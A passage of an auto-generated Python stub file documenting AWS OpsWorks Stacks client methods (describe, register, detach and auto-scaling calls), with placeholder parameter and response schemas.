]
)
:type StackId: string
:param StackId: The app stack ID. If you use this parameter, DescribeApps returns a description of the apps in the specified stack.
:type AppIds: list
:param AppIds: An array of app IDs for the apps to be described. If you use this parameter, DescribeApps returns a description of the specified apps. Otherwise, it returns a description of every app.
(string) --
:rtype: dict
:return: {
'Apps': [
{
'AppId': 'string',
'StackId': 'string',
'Shortname': 'string',
'Name': 'string',
'Description': 'string',
'DataSources': [
{
'Type': 'string',
'Arn': 'string',
'DatabaseName': 'string'
},
],
'Type': 'aws-flow-ruby'|'java'|'rails'|'php'|'nodejs'|'static'|'other',
'AppSource': {
'Type': 'git'|'svn'|'archive'|'s3',
'Url': 'string',
'Username': 'string',
'Password': 'string',
'SshKey': 'string',
'Revision': 'string'
},
'Domains': [
'string',
],
'EnableSsl': True|False,
'SslConfiguration': {
'Certificate': 'string',
'PrivateKey': 'string',
'Chain': 'string'
},
'Attributes': {
'string': 'string'
},
'CreatedAt': 'string',
'Environment': [
{
'Key': 'string',
'Value': 'string',
'Secure': True|False
},
]
},
]
}
:returns:
For Amazon S3 bundles, set Username to the appropriate IAM access key ID.
For HTTP bundles, Git repositories, and Subversion repositories, set Username to the user name.
"""
pass
def describe_commands(DeploymentId=None, InstanceId=None, CommandIds=None):
"""
Describes the results of specified commands.
See also: AWS API Documentation
:example: response = client.describe_commands(
DeploymentId='string',
InstanceId='string',
CommandIds=[
'string',
]
)
:type DeploymentId: string
:param DeploymentId: The deployment ID. If you include this parameter, DescribeCommands returns a description of the commands associated with the specified deployment.
:type InstanceId: string
:param InstanceId: The instance ID. If you include this parameter, DescribeCommands returns a description of the commands associated with the specified instance.
:type CommandIds: list
:param CommandIds: An array of command IDs. If you include this parameter, DescribeCommands returns a description of the specified commands. Otherwise, it returns a description of every command.
(string) --
:rtype: dict
:return: {
'Commands': [
{
'CommandId': 'string',
'InstanceId': 'string',
'DeploymentId': 'string',
'CreatedAt': 'string',
'AcknowledgedAt': 'string',
'CompletedAt': 'string',
'Status': 'string',
'ExitCode': 123,
'LogUrl': 'string',
'Type': 'string'
},
]
}
:returns:
failed
successful
skipped
pending
"""
pass
def describe_deployments(StackId=None, AppId=None, DeploymentIds=None):
"""
Requests a description of a specified set of deployments.
See also: AWS API Documentation
:example: response = client.describe_deployments(
StackId='string',
AppId='string',
DeploymentIds=[
'string',
]
)
:type StackId: string
:param StackId: The stack ID. If you include this parameter, DescribeDeployments returns a description of the commands associated with the specified stack.
:type AppId: string
:param AppId: The app ID. If you include this parameter, DescribeDeployments returns a description of the commands associated with the specified app.
:type DeploymentIds: list
:param DeploymentIds: An array of deployment IDs to be described. If you include this parameter, DescribeDeployments returns a description of the specified deployments. Otherwise, it returns a description of every deployment.
(string) --
:rtype: dict
:return: {
'Deployments': [
{
'DeploymentId': 'string',
'StackId': 'string',
'AppId': 'string',
'CreatedAt': 'string',
'CompletedAt': 'string',
'Duration': 123,
'IamUserArn': 'string',
'Comment': 'string',
'Command': {
'Name': 'install_dependencies'|'update_dependencies'|'update_custom_cookbooks'|'execute_recipes'|'configure'|'setup'|'deploy'|'rollback'|'start'|'stop'|'restart'|'undeploy',
'Args': {
'string': [
'string',
]
}
},
'Status': 'string',
'CustomJson': 'string',
'InstanceIds': [
'string',
]
},
]
}
:returns:
execute_recipes : Execute one or more recipes. To specify the recipes, set an Args parameter named recipes to the list of recipes to be executed. For example, to execute phpapp::appsetup , set Args to {"recipes":["phpapp::appsetup"]} .
install_dependencies : Install the stack's dependencies.
update_custom_cookbooks : Update the stack's custom cookbooks.
update_dependencies : Update the stack's dependencies.
"""
pass
def describe_ecs_clusters(EcsClusterArns=None, StackId=None, NextToken=None, MaxResults=None):
"""
Describes Amazon ECS clusters that are registered with a stack. If you specify only a stack ID, you can use the MaxResults and NextToken parameters to paginate the response. However, AWS OpsWorks Stacks currently supports only one cluster per layer, so the result set has a maximum of one element.
This call accepts only one resource-identifying parameter.
See also: AWS API Documentation
:example: response = client.describe_ecs_clusters(
EcsClusterArns=[
'string',
],
StackId='string',
NextToken='string',
MaxResults=123
)
:type EcsClusterArns: list
:param EcsClusterArns: A list of ARNs, one for each cluster to be described.
(string) --
:type StackId: string
:param StackId: A stack ID. DescribeEcsClusters returns a description of the cluster that is registered with the stack.
:type NextToken: string
:param NextToken: If the previous paginated request did not return all of the remaining results, the response object's``NextToken`` parameter value is set to a token. To retrieve the next set of results, call DescribeEcsClusters again and assign that token to the request object's NextToken parameter. If there are no remaining results, the previous response object's NextToken parameter is set to null .
:type MaxResults: integer
:param MaxResults: To receive a paginated response, use this parameter to specify the maximum number of results to be returned with a single call. If the number of available results exceeds this maximum, the response includes a NextToken value that you can assign to the NextToken request parameter to get the next set of results.
:rtype: dict
:return: {
'EcsClusters': [
{
'EcsClusterArn': 'string',
'EcsClusterName': 'string',
'StackId': 'string',
'RegisteredAt': 'string'
},
],
'NextToken': 'string'
}
"""
pass
def describe_elastic_ips(InstanceId=None, StackId=None, Ips=None):
"""
Describes Elastic IP addresses .
See also: AWS API Documentation
:example: response = client.describe_elastic_ips(
InstanceId='string',
StackId='string',
Ips=[
'string',
]
)
:type InstanceId: string
:param InstanceId: The instance ID. If you include this parameter, DescribeElasticIps returns a description of the Elastic IP addresses associated with the specified instance.
:type StackId: string
:param StackId: A stack ID. If you include this parameter, DescribeElasticIps returns a description of the Elastic IP addresses that are registered with the specified stack.
:type Ips: list
:param Ips: An array of Elastic IP addresses to be described. If you include this parameter, DescribeElasticIps returns a description of the specified Elastic IP addresses. Otherwise, it returns a description of every Elastic IP address.
(string) --
:rtype: dict
:return: {
'ElasticIps': [
{
'Ip': 'string',
'Name': 'string',
'Domain': 'string',
'Region': 'string',
'InstanceId': 'string'
},
]
}
"""
pass
def describe_elastic_load_balancers(StackId=None, LayerIds=None):
"""
Describes a stack's Elastic Load Balancing instances.
See also: AWS API Documentation
:example: response = client.describe_elastic_load_balancers(
StackId='string',
LayerIds=[
'string',
]
)
:type StackId: string
:param StackId: A stack ID. The action describes the stack's Elastic Load Balancing instances.
:type LayerIds: list
:param LayerIds: A list of layer IDs. The action describes the Elastic Load Balancing instances for the specified layers.
(string) --
:rtype: dict
:return: {
'ElasticLoadBalancers': [
{
'ElasticLoadBalancerName': 'string',
'Region': 'string',
'DnsName': 'string',
'StackId': 'string',
'LayerId': 'string',
'VpcId': 'string',
'AvailabilityZones': [
'string',
],
'SubnetIds': [
'string',
],
'Ec2InstanceIds': [
'string',
]
},
]
}
:returns:
(string) --
"""
pass
def describe_instances(StackId=None, LayerId=None, InstanceIds=None):
"""
Requests a description of a set of instances.
See also: AWS API Documentation
:example: response = client.describe_instances(
StackId='string',
LayerId='string',
InstanceIds=[
'string',
]
)
:type StackId: string
:param StackId: A stack ID. If you use this parameter, DescribeInstances returns descriptions of the instances associated with the specified stack.
:type LayerId: string
:param LayerId: A layer ID. If you use this parameter, DescribeInstances returns descriptions of the instances associated with the specified layer.
:type InstanceIds: list
:param InstanceIds: An array of instance IDs to be described. If you use this parameter, DescribeInstances returns a description of the specified instances. Otherwise, it returns a description of every instance.
(string) --
:rtype: dict
:return: {
'Instances': [
{
'AgentVersion': 'string',
'AmiId': 'string',
'Architecture': 'x86_64'|'i386',
'AutoScalingType': 'load'|'timer',
'AvailabilityZone': 'string',
'BlockDeviceMappings': [
{
'DeviceName': 'string',
'NoDevice': 'string',
'VirtualName': 'string',
'Ebs': {
'SnapshotId': 'string',
'Iops': 123,
'VolumeSize': 123,
'VolumeType': 'gp2'|'io1'|'standard',
'DeleteOnTermination': True|False
}
},
],
'CreatedAt': 'string',
'EbsOptimized': True|False,
'Ec2InstanceId': 'string',
'EcsClusterArn': 'string',
'EcsContainerInstanceArn': 'string',
'ElasticIp': 'string',
'Hostname': 'string',
'InfrastructureClass': 'string',
'InstallUpdatesOnBoot': True|False,
'InstanceId': 'string',
'InstanceProfileArn': 'string',
'InstanceType': 'string',
'LastServiceErrorId': 'string',
'LayerIds': [
'string',
],
'Os': 'string',
'Platform': 'string',
'PrivateDns': 'string',
'PrivateIp': 'string',
'PublicDns': 'string',
'PublicIp': 'string',
'RegisteredBy': 'string',
'ReportedAgentVersion': 'string',
'ReportedOs': {
'Family': 'string',
'Name': 'string',
'Version': 'string'
},
'RootDeviceType': 'ebs'|'instance-store',
'RootDeviceVolumeId': 'string',
'SecurityGroupIds': [
'string',
],
'SshHostDsaKeyFingerprint': 'string',
'SshHostRsaKeyFingerprint': 'string',
'SshKeyName': 'string',
'StackId': 'string',
'Status': 'string',
'SubnetId': 'string',
'Tenancy': 'string',
'VirtualizationType': 'paravirtual'|'hvm'
},
]
}
:returns:
(string) --
"""
pass
def describe_layers(StackId=None, LayerIds=None):
"""
Requests a description of one or more layers in a specified stack.
See also: AWS API Documentation
:example: response = client.describe_layers(
StackId='string',
LayerIds=[
'string',
]
)
:type StackId: string
:param StackId: The stack ID.
:type LayerIds: list
:param LayerIds: An array of layer IDs that specify the layers to be described. If you omit this parameter, DescribeLayers returns a description of every layer in the specified stack.
(string) --
:rtype: dict
:return: {
'Layers': [
{
'StackId': 'string',
'LayerId': 'string',
'Type': 'aws-flow-ruby'|'ecs-cluster'|'java-app'|'lb'|'web'|'php-app'|'rails-app'|'nodejs-app'|'memcached'|'db-master'|'monitoring-master'|'custom',
'Name': 'string',
'Shortname': 'string',
'Attributes': {
'string': 'string'
},
'CloudWatchLogsConfiguration': {
'Enabled': True|False,
'LogStreams': [
{
'LogGroupName': 'string',
'DatetimeFormat': 'string',
'TimeZone': 'LOCAL'|'UTC',
'File': 'string',
'FileFingerprintLines': 'string',
'MultiLineStartPattern': 'string',
'InitialPosition': 'start_of_file'|'end_of_file',
'Encoding': 'ascii'|'big5'|'big5hkscs'|'cp037'|'cp424'|'cp437'|'cp500'|'cp720'|'cp737'|'cp775'|'cp850'|'cp852'|'cp855'|'cp856'|'cp857'|'cp858'|'cp860'|'cp861'|'cp862'|'cp863'|'cp864'|'cp865'|'cp866'|'cp869'|'cp874'|'cp875'|'cp932'|'cp949'|'cp950'|'cp1006'|'cp1026'|'cp1140'|'cp1250'|'cp1251'|'cp1252'|'cp1253'|'cp1254'|'cp1255'|'cp1256'|'cp1257'|'cp1258'|'euc_jp'|'euc_jis_2004'|'euc_jisx0213'|'euc_kr'|'gb2312'|'gbk'|'gb18030'|'hz'|'iso2022_jp'|'iso2022_jp_1'|'iso2022_jp_2'|'iso2022_jp_2004'|'iso2022_jp_3'|'iso2022_jp_ext'|'iso2022_kr'|'latin_1'|'iso8859_2'|'iso8859_3'|'iso8859_4'|'iso8859_5'|'iso8859_6'|'iso8859_7'|'iso8859_8'|'iso8859_9'|'iso8859_10'|'iso8859_13'|'iso8859_14'|'iso8859_15'|'iso8859_16'|'johab'|'koi8_r'|'koi8_u'|'mac_cyrillic'|'mac_greek'|'mac_iceland'|'mac_latin2'|'mac_roman'|'mac_turkish'|'ptcp154'|'shift_jis'|'shift_jis_2004'|'shift_jisx0213'|'utf_32'|'utf_32_be'|'utf_32_le'|'utf_16'|'utf_16_be'|'utf_16_le'|'utf_7'|'utf_8'|'utf_8_sig',
'BufferDuration': 123,
'BatchCount': 123,
'BatchSize': 123
},
]
},
'CustomInstanceProfileArn': 'string',
'CustomJson': 'string',
'CustomSecurityGroupIds': [
'string',
],
'DefaultSecurityGroupNames': [
'string',
],
'Packages': [
'string',
],
'VolumeConfigurations': [
{
'MountPoint': 'string',
'RaidLevel': 123,
'NumberOfDisks': 123,
'Size': 123,
'VolumeType': 'string',
'Iops': 123
},
],
'EnableAutoHealing': True|False,
'AutoAssignElasticIps': True|False,
'AutoAssignPublicIps': True|False,
'DefaultRecipes': {
'Setup': [
'string',
],
'Configure': [
'string',
],
'Deploy': [
'string',
],
'Undeploy': [
'string',
],
'Shutdown': [
'string',
]
},
'CustomRecipes': {
'Setup': [
'string',
],
'Configure': [
'string',
],
'Deploy': [
'string',
],
'Undeploy': [
'string',
],
'Shutdown': [
'string',
]
},
'CreatedAt': 'string',
'InstallUpdatesOnBoot': True|False,
'UseEbsOptimizedInstances': True|False,
'LifecycleEventConfiguration': {
'Shutdown': {
'ExecutionTimeout': 123,
'DelayUntilElbConnectionsDrained': True|False
}
}
},
]
}
:returns:
(string) --
(string) --
"""
pass
def describe_load_based_auto_scaling(LayerIds=None):
"""
Describes load-based auto scaling configurations for specified layers.
See also: AWS API Documentation
:example: response = client.describe_load_based_auto_scaling(
LayerIds=[
'string',
]
)
:type LayerIds: list
:param LayerIds: [REQUIRED]
An array of layer IDs.
(string) --
:rtype: dict
:return: {
'LoadBasedAutoScalingConfigurations': [
{
'LayerId': 'string',
'Enable': True|False,
'UpScaling': {
'InstanceCount': 123,
'ThresholdsWaitTime': 123,
'IgnoreMetricsTime': 123,
'CpuThreshold': 123.0,
'MemoryThreshold': 123.0,
'LoadThreshold': 123.0,
'Alarms': [
'string',
]
},
'DownScaling': {
'InstanceCount': 123,
'ThresholdsWaitTime': 123,
'IgnoreMetricsTime': 123,
'CpuThreshold': 123.0,
'MemoryThreshold': 123.0,
'LoadThreshold': 123.0,
'Alarms': [
'string',
]
}
},
]
}
:returns:
(string) --
"""
pass
def describe_my_user_profile():
"""
Describes a user's SSH information.
See also: AWS API Documentation
:example: response = client.describe_my_user_profile()
:rtype: dict
:return: {
'UserProfile': {
'IamUserArn': 'string',
'Name': 'string',
'SshUsername': 'string',
'SshPublicKey': 'string'
}
}
"""
pass
def describe_permissions(IamUserArn=None, StackId=None):
"""
Describes the permissions for a specified stack.
See also: AWS API Documentation
:example: response = client.describe_permissions(
IamUserArn='string',
StackId='string'
)
:type IamUserArn: string
:param IamUserArn: The user's IAM ARN. This can also be a federated user's ARN. For more information about IAM ARNs, see Using Identifiers .
:type StackId: string
:param StackId: The stack ID.
:rtype: dict
:return: {
'Permissions': [
{
'StackId': 'string',
'IamUserArn': 'string',
'AllowSsh': True|False,
'AllowSudo': True|False,
'Level': 'string'
},
]
}
:returns:
If the request object contains only a stack ID, the array contains a Permission object with permissions for each of the stack IAM ARNs.
If the request object contains only an IAM ARN, the array contains a Permission object with permissions for each of the user's stack IDs.
If the request contains a stack ID and an IAM ARN, the array contains a single Permission object with permissions for the specified stack and IAM ARN.
"""
pass
def describe_raid_arrays(InstanceId=None, StackId=None, RaidArrayIds=None):
"""
Describe an instance's RAID arrays.
See also: AWS API Documentation
:example: response = client.describe_raid_arrays(
InstanceId='string',
StackId='string',
RaidArrayIds=[
'string',
]
)
:type InstanceId: string
:param InstanceId: The instance ID. If you use this parameter, DescribeRaidArrays returns descriptions of the RAID arrays associated with the specified instance.
:type StackId: string
:param StackId: The stack ID.
:type RaidArrayIds: list
:param RaidArrayIds: An array of RAID array IDs. If you use this parameter, DescribeRaidArrays returns descriptions of the specified arrays. Otherwise, it returns a description of every array.
(string) --
:rtype: dict
:return: {
'RaidArrays': [
{
'RaidArrayId': 'string',
'InstanceId': 'string',
'Name': 'string',
'RaidLevel': 123,
'NumberOfDisks': 123,
'Size': 123,
'Device': 'string',
'MountPoint': 'string',
'AvailabilityZone': 'string',
'CreatedAt': 'string',
'StackId': 'string',
'VolumeType': 'string',
'Iops': 123
},
]
}
"""
pass
def describe_rds_db_instances(StackId=None, RdsDbInstanceArns=None):
"""
Describes Amazon RDS instances.
This call accepts only one resource-identifying parameter.
See also: AWS API Documentation
:example: response = client.describe_rds_db_instances(
StackId='string',
RdsDbInstanceArns=[
'string',
]
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID that the instances are registered with. The operation returns descriptions of all registered Amazon RDS instances.
:type RdsDbInstanceArns: list
:param RdsDbInstanceArns: An array containing the ARNs of the instances to be described.
(string) --
:rtype: dict
:return: {
'RdsDbInstances': [
{
'RdsDbInstanceArn': 'string',
'DbInstanceIdentifier': 'string',
'DbUser': 'string',
'DbPassword': 'string',
'Region': 'string',
'Address': 'string',
'Engine': 'string',
'StackId': 'string',
'MissingOnRds': True|False
},
]
}
"""
pass
def describe_service_errors(StackId=None, InstanceId=None, ServiceErrorIds=None):
"""
Describes AWS OpsWorks Stacks service errors.
This call accepts only one resource-identifying parameter.
See also: AWS API Documentation
:example: response = client.describe_service_errors(
StackId='string',
InstanceId='string',
ServiceErrorIds=[
'string',
]
)
:type StackId: string
:param StackId: The stack ID. If you use this parameter, DescribeServiceErrors returns descriptions of the errors associated with the specified stack.
:type InstanceId: string
:param InstanceId: The instance ID. If you use this parameter, DescribeServiceErrors returns descriptions of the errors associated with the specified instance.
:type ServiceErrorIds: list
:param ServiceErrorIds: An array of service error IDs. If you use this parameter, DescribeServiceErrors returns descriptions of the specified errors. Otherwise, it returns a description of every error.
(string) --
:rtype: dict
:return: {
'ServiceErrors': [
{
'ServiceErrorId': 'string',
'StackId': 'string',
'InstanceId': 'string',
'Type': 'string',
'Message': 'string',
'CreatedAt': 'string'
},
]
}
"""
pass
def describe_stack_provisioning_parameters(StackId=None):
"""
Requests a description of a stack's provisioning parameters.
See also: AWS API Documentation
:example: response = client.describe_stack_provisioning_parameters(
StackId='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID
:rtype: dict
:return: {
'AgentInstallerUrl': 'string',
'Parameters': {
'string': 'string'
}
}
"""
pass
def describe_stack_summary(StackId=None):
"""
Describes the number of layers and apps in a specified stack, and the number of instances in each state, such as running_setup or online .
See also: AWS API Documentation
:example: response = client.describe_stack_summary(
StackId='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:rtype: dict
:return: {
'StackSummary': {
'StackId': 'string',
'Name': 'string',
'Arn': 'string',
'LayersCount': 123,
'AppsCount': 123,
'InstancesCount': {
'Assigning': 123,
'Booting': 123,
'ConnectionLost': 123,
'Deregistering': 123,
'Online': 123,
'Pending': 123,
'Rebooting': 123,
'Registered': 123,
'Registering': 123,
'Requested': 123,
'RunningSetup': 123,
'SetupFailed': 123,
'ShuttingDown': 123,
'StartFailed': 123,
'Stopped': 123,
'Stopping': 123,
'Terminated': 123,
'Terminating': 123,
'Unassigning': 123
}
}
}
"""
pass
def describe_stacks(StackIds=None):
"""
Requests a description of one or more stacks.
See also: AWS API Documentation
:example: response = client.describe_stacks(
StackIds=[
'string',
]
)
:type StackIds: list
:param StackIds: An array of stack IDs that specify the stacks to be described. If you omit this parameter, DescribeStacks returns a description of every stack.
(string) --
:rtype: dict
:return: {
'Stacks': [
{
'StackId': 'string',
'Name': 'string',
'Arn': 'string',
'Region': 'string',
'VpcId': 'string',
'Attributes': {
'string': 'string'
},
'ServiceRoleArn': 'string',
'DefaultInstanceProfileArn': 'string',
'DefaultOs': 'string',
'HostnameTheme': 'string',
'DefaultAvailabilityZone': 'string',
'DefaultSubnetId': 'string',
'CustomJson': 'string',
'ConfigurationManager': {
'Name': 'string',
'Version': 'string'
},
'ChefConfiguration': {
'ManageBerkshelf': True|False,
'BerkshelfVersion': 'string'
},
'UseCustomCookbooks': True|False,
'UseOpsworksSecurityGroups': True|False,
'CustomCookbooksSource': {
'Type': 'git'|'svn'|'archive'|'s3',
'Url': 'string',
'Username': 'string',
'Password': 'string',
'SshKey': 'string',
'Revision': 'string'
},
'DefaultSshKeyName': 'string',
'CreatedAt': 'string',
'DefaultRootDeviceType': 'ebs'|'instance-store',
'AgentVersion': 'string'
},
]
}
:returns:
(string) --
(string) --
"""
pass
def describe_time_based_auto_scaling(InstanceIds=None):
"""
Describes time-based auto scaling configurations for specified instances.
See also: AWS API Documentation
:example: response = client.describe_time_based_auto_scaling(
InstanceIds=[
'string',
]
)
:type InstanceIds: list
:param InstanceIds: [REQUIRED]
An array of instance IDs.
(string) --
:rtype: dict
:return: {
'TimeBasedAutoScalingConfigurations': [
{
'InstanceId': 'string',
'AutoScalingSchedule': {
'Monday': {
'string': 'string'
},
'Tuesday': {
'string': 'string'
},
'Wednesday': {
'string': 'string'
},
'Thursday': {
'string': 'string'
},
'Friday': {
'string': 'string'
},
'Saturday': {
'string': 'string'
},
'Sunday': {
'string': 'string'
}
}
},
]
}
:returns:
(string) --
(string) --
"""
pass
def describe_user_profiles(IamUserArns=None):
"""
Describe specified users.
See also: AWS API Documentation
:example: response = client.describe_user_profiles(
IamUserArns=[
'string',
]
)
:type IamUserArns: list
:param IamUserArns: An array of IAM or federated user ARNs that identify the users to be described.
(string) --
:rtype: dict
:return: {
'UserProfiles': [
{
'IamUserArn': 'string',
'Name': 'string',
'SshUsername': 'string',
'SshPublicKey': 'string',
'AllowSelfManagement': True|False
},
]
}
"""
pass
def describe_volumes(InstanceId=None, StackId=None, RaidArrayId=None, VolumeIds=None):
"""
Describes an instance's Amazon EBS volumes.
See also: AWS API Documentation
:example: response = client.describe_volumes(
InstanceId='string',
StackId='string',
RaidArrayId='string',
VolumeIds=[
'string',
]
)
:type InstanceId: string
:param InstanceId: The instance ID. If you use this parameter, DescribeVolumes returns descriptions of the volumes associated with the specified instance.
:type StackId: string
:param StackId: A stack ID. The action describes the stack's registered Amazon EBS volumes.
:type RaidArrayId: string
:param RaidArrayId: The RAID array ID. If you use this parameter, DescribeVolumes returns descriptions of the volumes associated with the specified RAID array.
:type VolumeIds: list
:param VolumeIds: Am array of volume IDs. If you use this parameter, DescribeVolumes returns descriptions of the specified volumes. Otherwise, it returns a description of every volume.
(string) --
:rtype: dict
:return: {
'Volumes': [
{
'VolumeId': 'string',
'Ec2VolumeId': 'string',
'Name': 'string',
'RaidArrayId': 'string',
'InstanceId': 'string',
'Status': 'string',
'Size': 123,
'Device': 'string',
'MountPoint': 'string',
'Region': 'string',
'AvailabilityZone': 'string',
'VolumeType': 'string',
'Iops': 123
},
]
}
"""
pass
def detach_elastic_load_balancer(ElasticLoadBalancerName=None, LayerId=None):
"""
Detaches a specified Elastic Load Balancing instance from its layer.
See also: AWS API Documentation
:example: response = client.detach_elastic_load_balancer(
ElasticLoadBalancerName='string',
LayerId='string'
)
:type ElasticLoadBalancerName: string
:param ElasticLoadBalancerName: [REQUIRED]
The Elastic Load Balancing instance's name.
:type LayerId: string
:param LayerId: [REQUIRED]
The ID of the layer that the Elastic Load Balancing instance is attached to.
"""
pass
def disassociate_elastic_ip(ElasticIp=None):
"""
Disassociates an Elastic IP address from its instance. The address remains registered with the stack. For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.disassociate_elastic_ip(
ElasticIp='string'
)
:type ElasticIp: string
:param ElasticIp: [REQUIRED]
The Elastic IP address.
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
ClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method's model.
"""
pass
def get_hostname_suggestion(LayerId=None):
"""
Gets a generated host name for the specified layer, based on the current host name theme.
See also: AWS API Documentation
:example: response = client.get_hostname_suggestion(
LayerId='string'
)
:type LayerId: string
:param LayerId: [REQUIRED]
The layer ID.
:rtype: dict
:return: {
'LayerId': 'string',
'Hostname': 'string'
}
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
"""
pass
def get_waiter():
"""
"""
pass
def grant_access(InstanceId=None, ValidForInMinutes=None):
"""
Grants RDP access to a Windows instance for a specified time period.
See also: AWS API Documentation
:example: response = client.grant_access(
InstanceId='string',
ValidForInMinutes=123
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance's AWS OpsWorks Stacks ID.
:type ValidForInMinutes: integer
:param ValidForInMinutes: The length of time (in minutes) that the grant is valid. When the grant expires at the end of this period, the user will no longer be able to use the credentials to log in. If the user is logged in at the time, he or she automatically will be logged out.
:rtype: dict
:return: {
'TemporaryCredential': {
'Username': 'string',
'Password': 'string',
'ValidForInMinutes': 123,
'InstanceId': 'string'
}
}
"""
pass
def reboot_instance(InstanceId=None):
"""
Reboots a specified instance. For more information, see Starting, Stopping, and Rebooting Instances .
See also: AWS API Documentation
:example: response = client.reboot_instance(
InstanceId='string'
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
"""
pass
def register_ecs_cluster(EcsClusterArn=None, StackId=None):
"""
Registers a specified Amazon ECS cluster with a stack. You can register only one cluster with a stack. A cluster can be registered with only one stack. For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.register_ecs_cluster(
EcsClusterArn='string',
StackId='string'
)
:type EcsClusterArn: string
:param EcsClusterArn: [REQUIRED]
The cluster's ARN.
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:rtype: dict
:return: {
'EcsClusterArn': 'string'
}
"""
pass
def register_elastic_ip(ElasticIp=None, StackId=None):
"""
Registers an Elastic IP address with a specified stack. An address can be registered with only one stack at a time. If the address is already registered, you must first deregister it by calling DeregisterElasticIp . For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.register_elastic_ip(
ElasticIp='string',
StackId='string'
)
:type ElasticIp: string
:param ElasticIp: [REQUIRED]
The Elastic IP address.
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:rtype: dict
:return: {
'ElasticIp': 'string'
}
"""
pass
def register_instance(StackId=None, Hostname=None, PublicIp=None, PrivateIp=None, RsaPublicKey=None, RsaPublicKeyFingerprint=None, InstanceIdentity=None):
"""
Registers instances that were created outside of AWS OpsWorks Stacks with a specified stack.
Registered instances have the same requirements as instances that are created by using the CreateInstance API. For example, registered instances must be running a supported Linux-based operating system, and they must have a supported instance type. For more information about requirements for instances that you want to register, see Preparing the Instance .
See also: AWS API Documentation
:example: response = client.register_instance(
StackId='string',
Hostname='string',
PublicIp='string',
PrivateIp='string',
RsaPublicKey='string',
RsaPublicKeyFingerprint='string',
InstanceIdentity={
'Document': 'string',
'Signature': 'string'
}
)
:type StackId: string
:param StackId: [REQUIRED]
The ID of the stack that the instance is to be registered with.
:type Hostname: string
:param Hostname: The instance's hostname.
:type PublicIp: string
:param PublicIp: The instance's public IP address.
:type PrivateIp: string
:param PrivateIp: The instance's private IP address.
:type RsaPublicKey: string
:param RsaPublicKey: The instances public RSA key. This key is used to encrypt communication between the instance and the service.
:type RsaPublicKeyFingerprint: string
:param RsaPublicKeyFingerprint: The instances public RSA key fingerprint.
:type InstanceIdentity: dict
:param InstanceIdentity: An InstanceIdentity object that contains the instance's identity.
Document (string) --A JSON document that contains the metadata.
Signature (string) --A signature that can be used to verify the document's accuracy and authenticity.
:rtype: dict
:return: {
'InstanceId': 'string'
}
"""
pass
def register_rds_db_instance(StackId=None, RdsDbInstanceArn=None, DbUser=None, DbPassword=None):
"""
Registers an Amazon RDS instance with a stack.
See also: AWS API Documentation
:example: response = client.register_rds_db_instance(
StackId='string',
RdsDbInstanceArn='string',
DbUser='string',
DbPassword='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:type RdsDbInstanceArn: string
:param RdsDbInstanceArn: [REQUIRED]
The Amazon RDS instance's ARN.
:type DbUser: string
:param DbUser: [REQUIRED]
The database's master user name.
:type DbPassword: string
:param DbPassword: [REQUIRED]
The database password.
"""
pass
def register_volume(Ec2VolumeId=None, StackId=None):
"""
Registers an Amazon EBS volume with a specified stack. A volume can be registered with only one stack at a time. If the volume is already registered, you must first deregister it by calling DeregisterVolume . For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.register_volume(
Ec2VolumeId='string',
StackId='string'
)
:type Ec2VolumeId: string
:param Ec2VolumeId: The Amazon EBS volume ID.
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:rtype: dict
:return: {
'VolumeId': 'string'
}
"""
pass
def set_load_based_auto_scaling(LayerId=None, Enable=None, UpScaling=None, DownScaling=None):
"""
Specify the load-based auto scaling configuration for a specified layer. For more information, see Managing Load with Time-based and Load-based Instances .
See also: AWS API Documentation
:example: response = client.set_load_based_auto_scaling(
LayerId='string',
Enable=True|False,
UpScaling={
'InstanceCount': 123,
'ThresholdsWaitTime': 123,
'IgnoreMetricsTime': 123,
'CpuThreshold': 123.0,
'MemoryThreshold': 123.0,
'LoadThreshold': 123.0,
'Alarms': [
'string',
]
},
DownScaling={
'InstanceCount': 123,
'ThresholdsWaitTime': 123,
'IgnoreMetricsTime': 123,
'CpuThreshold': 123.0,
'MemoryThreshold': 123.0,
'LoadThreshold': 123.0,
'Alarms': [
'string',
]
}
)
:type LayerId: string
:param LayerId: [REQUIRED]
The layer ID.
:type Enable: boolean
:param Enable: Enables load-based auto scaling for the layer.
:type UpScaling: dict
:param UpScaling: An AutoScalingThresholds object with the upscaling threshold configuration. If the load exceeds these thresholds for a specified amount of time, AWS OpsWorks Stacks starts a specified number of instances.
InstanceCount (integer) --The number of instances to add or remove when the load exceeds a threshold.
ThresholdsWaitTime (integer) --The amount of time, in minutes, that the load must exceed a threshold before more instances are added or removed.
IgnoreMetricsTime (integer) --The amount of time (in minutes) after a scaling event occurs that AWS OpsWorks Stacks should ignore metrics and suppress additional scaling events. For example, AWS OpsWorks Stacks adds new instances following an upscaling event but the instances won't start reducing the load until they have been booted and configured. There is no point in raising additional scaling events during that operation, which typically takes several minutes. IgnoreMetricsTime allows you to direct AWS OpsWorks Stacks to suppress scaling events long enough to get the new instances online.
CpuThreshold (float) --The CPU utilization threshold, as a percent of the available CPU. A value of -1 disables the threshold.
MemoryThreshold (float) --The memory utilization threshold, as a percent of the available memory. A value of -1 disables the threshold.
